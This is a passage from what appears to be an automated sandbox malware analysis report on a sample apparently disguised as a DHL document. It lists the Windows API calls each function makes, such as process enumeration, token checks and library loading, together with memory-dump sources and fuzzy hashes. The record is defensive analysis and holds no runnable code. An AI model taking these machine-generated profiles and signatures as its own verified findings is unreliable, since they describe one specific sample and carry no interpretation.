                                                                                      • GetCaretPos.USER32(?), ref: 000C16FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 000C174C
                                                                                      • GetForegroundWindow.USER32 ref: 000C1752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      • Opcode ID: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                      • Instruction ID: bc3ab090f351f151e8d7821f02604cd360b918b05cb1d28ee6586bdd5cc126f6
                                                                                      • Opcode Fuzzy Hash: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                      • Instruction Fuzzy Hash: 22315E75D04249AFDB04EFA9C881DEEBBFDEF49304B5080A9E419E7212D6319E45CFA0
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0009D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      • Opcode ID: e66a735b83ea5fcf66693618b34dc9d11d5c0efe12978dd7770500357b790614
                                                                                      • Instruction ID: d0d3072cf855d5879fce946656e465ba494c6f3fa5ec470c84509812d43f047b
                                                                                      • Opcode Fuzzy Hash: e66a735b83ea5fcf66693618b34dc9d11d5c0efe12978dd7770500357b790614
                                                                                      • Instruction Fuzzy Hash: 2731A4711083009FD701EF54C881EAFBBF8EFD9354F54092DF585861A2EB719945CB92
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,000CCB68), ref: 0009D2FB
                                                                                      • GetLastError.KERNEL32 ref: 0009D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000CCB68), ref: 0009D376
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      • Opcode ID: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                      • Instruction ID: 3514d33584b73f11b46aea954a1fd1f59d59fb59b1af040dc19ec16f4125f7f0
                                                                                      • Opcode Fuzzy Hash: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                      • Instruction Fuzzy Hash: E121A370548201DF9B10DF24C8818AE77E8EF55365F508A1EF499C72A2DB30DA46DB93
                                                                                      APIs
                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                                                                        • Part of subcall function 00091014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                                                                        • Part of subcall function 00091014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                                                                        • Part of subcall function 00091014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000915BE
                                                                                      • _memcmp.LIBVCRUNTIME ref: 000915E1
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00091617
                                                                                      • HeapFree.KERNEL32(00000000), ref: 0009161E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1592001646-0
                                                                                      • Opcode ID: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                      • Instruction ID: 9127330d878047bf95791e07e9383d4ef5514a538536e009921ca6a5a8336c11
                                                                                      • Opcode Fuzzy Hash: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                      • Instruction Fuzzy Hash: 5F218C31E4410AEFEF00DFA4C949BEEB7F8EF44344F194459E445AB241E774AA05EBA0
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 000C280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000C2840
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                      • Instruction ID: fd27a1d20b364e05cb875fa24d24a7aa4276b9f576eb43986e30a712551f43ed
                                                                                      • Opcode Fuzzy Hash: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                      • Instruction Fuzzy Hash: 0C21D631209511AFE714DB24C844FAE7799AF45324F14825CF41ACBAE2CB75FC82C790
                                                                                      APIs
                                                                                        • Part of subcall function 00098D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098D8C
                                                                                        • Part of subcall function 00098D7D: lstrcpyW.KERNEL32(00000000,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00098DB2
                                                                                        • Part of subcall function 00098D7D: lstrcmpiW.KERNEL32(00000000,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: 74622af115f510d11e75d7aa69a4b91cc97337d102078d993dd4876d61143c54
                                                                                      • Instruction ID: bad0bdd28ddc465f64428c6573750e1f4c3cb7f67ce4bc9b04aa661c993438ef
                                                                                      • Opcode Fuzzy Hash: 74622af115f510d11e75d7aa69a4b91cc97337d102078d993dd4876d61143c54
                                                                                      • Instruction Fuzzy Hash: 4011067A210202AFDF159F35D844E7B77E5FF85350B10402AF90ACB265EF319801D751
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 000C7D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000C7D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000AB7AD,00000000), ref: 000C7D6B
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                                                                      • Instruction ID: d18f42daa83608d3fb6f8deaae32a9aa29d9d8e9e1bfee3073adf5dc6d59e548
                                                                                      • Opcode Fuzzy Hash: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                                                                      • Instruction Fuzzy Hash: 09118932604615AFDB149F28DC04EAA3BA5AF45364F158728F83ADB2F0E7349990CB90
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 000C56BB
                                                                                      • _wcslen.LIBCMT ref: 000C56CD
                                                                                      • _wcslen.LIBCMT ref: 000C56D8
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 455545452-0
                                                                                      • Opcode ID: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                      • Instruction ID: ebd390d279b93f4e9926893f4898db91cc24a28c6b8af326aac0d07028e57c2c
                                                                                      • Opcode Fuzzy Hash: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                      • Instruction Fuzzy Hash: 3711D379600608A6DF209F65CC85FEF77ACEF1176AB10416EF915D6081EB74EAC4CB60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 158a7fe538311256812edf8a1b75badc0a4c79c80e7db2c2bceaef72a0a5d06d
                                                                                      • Instruction ID: df3622a80906cb5a9781c5dd74a14850f8cfaa9233c2cf005d74125fec42eba5
                                                                                      • Opcode Fuzzy Hash: 158a7fe538311256812edf8a1b75badc0a4c79c80e7db2c2bceaef72a0a5d06d
                                                                                      • Instruction Fuzzy Hash: 7C01D1B260AA163EF66126B86CC1FAB665FDF827B8F380325F521A12D2DB708C005170
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00091A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                      • Instruction ID: 5f49610bfb2376e4b64e7e4bb921e42679018f4294808924b211485280e19925
                                                                                      • Opcode Fuzzy Hash: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                      • Instruction Fuzzy Hash: 7411FA3AE01219FFEF119BA5C985FEDBB78EB04750F200091E604B7290D6716E50EB94
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0009E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0009E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0009E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0009E24D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                      • Instruction ID: 4b7b9169adb3173e20e4bfb92e158f5289372f4814cffd889db9f22cb01af219
                                                                                      • Opcode Fuzzy Hash: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                      • Instruction Fuzzy Hash: 2A110872904254BBEB01DBA8EC05E9E7FADEB45320F144216F924D7691D6B48D0487A0
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,?,0005CFF9,00000000,00000004,00000000), ref: 0005D218
                                                                                      • GetLastError.KERNEL32 ref: 0005D224
                                                                                      • __dosmaperr.LIBCMT ref: 0005D22B
                                                                                      • ResumeThread.KERNEL32(00000000), ref: 0005D249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 173952441-0
                                                                                      • Opcode ID: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                      • Instruction ID: a61c9d3e100bd9cf857884b26a079c15ce5dbf954d6bd248c091b3bd9a8ef812
                                                                                      • Opcode Fuzzy Hash: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                      • Instruction Fuzzy Hash: 2601D276805204BBEB315BA6DC09FAF7AA9DF91332F10021BFD25961D1DB748909C7A0
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 00036060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                      • Instruction ID: 8e58992780ffa529b7ccd6e83a4580c24e0012c0ab5d92180ad4cfcc8a17ec26
                                                                                      • Opcode Fuzzy Hash: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                      • Instruction Fuzzy Hash: C3115B72501548BFEF264FA4DC55EEBBBADEF093A4F044215FA1892120D736EC609BA0
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00053B56
                                                                                        • Part of subcall function 00053AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00053AD2
                                                                                        • Part of subcall function 00053AA3: ___AdjustPointer.LIBCMT ref: 00053AED
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00053B6B
                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00053B7C
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00053BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 737400349-0
                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction ID: ccd8080e06b4f5f0c074af5d8e5e2d3cbf6e9601b68b9ebc78007fbe908e5fcf
                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction Fuzzy Hash: FD014C32100148BBDF125E95CC42EEB7FADEF48799F044014FE4896122C732E965DBA0
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000313C6,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue), ref: 000630A5
                                                                                      • GetLastError.KERNEL32(?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000,00000364,?,00062E46), ref: 000630B1
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000), ref: 000630BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                      • Instruction ID: da791f5f3d99fc716246a8cef39bd1493f956986c9ad78b99aeda9b1fe2bddbf
                                                                                      • Opcode Fuzzy Hash: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                      • Instruction Fuzzy Hash: 78012B32301222ABFB314BB9EC54E577BDAEF05BA1B100720F909E3140CB35D909C6E0
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0009747F
                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00097497
                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000974AC
                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000974CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
